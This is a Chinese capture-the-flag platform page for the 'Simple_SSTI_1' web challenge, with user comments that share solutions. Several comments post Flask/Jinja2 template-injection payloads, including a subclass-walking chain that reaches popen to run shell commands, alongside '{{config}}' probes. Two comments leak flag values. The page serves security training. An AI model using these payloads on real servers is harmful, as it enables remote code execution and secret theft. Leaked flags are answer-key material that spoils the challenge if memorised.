Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 28880
提  示:
描  述:
Simple_SSTI_1
...
登录回复
评论
2027347950 2年前
举报

?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}

回复 1
iii1 2年前
举报

?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}

回复 2
DragonWE 2年前
举报

flag{9c260fb48e0a0db7708b6f3ebe9ff732}

回复 0
iain4048 2年前
举报

查看源代码提示找secret key value

回复 0
13663536751 2年前
举报

flag{e0ad0234936fcd15f11c7bb0f9d587e7}

回复 0
2346254613 2年前
举报

这个是答案吗

回复 1
啊这这 2年前
举报

使用{{config}}获得flag,因为config是用来获取当前配置的,配置主要有cookie名字和值之类的,这里的flag就是存放在cookie中(个人理解,如果不对请矫正)

回复 3
avengert 2年前
举报

你们这么泄题,一会儿不得刷一轮儿了啊。

回复 0
xbhgg 2年前
举报

大神们怎么知道的参数里面放的是config。。。

回复 0
justsosoloveyou 2年前
举报

POC: /?flag={{config}} 或 /?flag={{config.SECRET_KEY}} 原理:SSTI 就是服务器端模板注入(Server-Side Template Injection),可以获取前端传入参数的值进行处理,类似于 {{}} 的变量经过引擎解析的时候,进行了执行,然后渲染并填充到web页面。 思路:页面提示flag参数,源码注释提示secret_key参

回复 8
Komorebi41 2年前
举报

在网址后面加上: /?flag={{config.SECRET_KEY}}的原因:flask的模板注入.flask会把类似于 {]的变量当做参数来渲染并填充到web页面,且根据F12后代码提示,我们知道是在config.secret_key中的

回复 10

WriteUp

image
valecalida

5 金币

立即查看

评分(51)

解题动态

yezhongyu 攻破了该题 6小时前
神月出云1 攻破了该题 8小时前
271199@ 攻破了该题 2天前
dacming9527 攻破了该题 3天前
喜樂乐 攻破了该题 3天前
yehlg 攻破了该题 3天前
ggtom 攻破了该题 3天前
mwhatevery 攻破了该题 4天前
安藏七月 攻破了该题 5天前
serena7780 攻破了该题 6天前
baisui 攻破了该题 7天前
sc001 攻破了该题 8天前
河理0ld6 攻破了该题 8天前
BurnE001 攻破了该题 8天前
OvOawa 攻破了该题 8天前
船长 攻破了该题 10天前
Ahri 攻破了该题 10天前
SQZ 攻破了该题 11天前
wuyong5025 攻破了该题 13天前
1WWQ 攻破了该题 13天前
问题反馈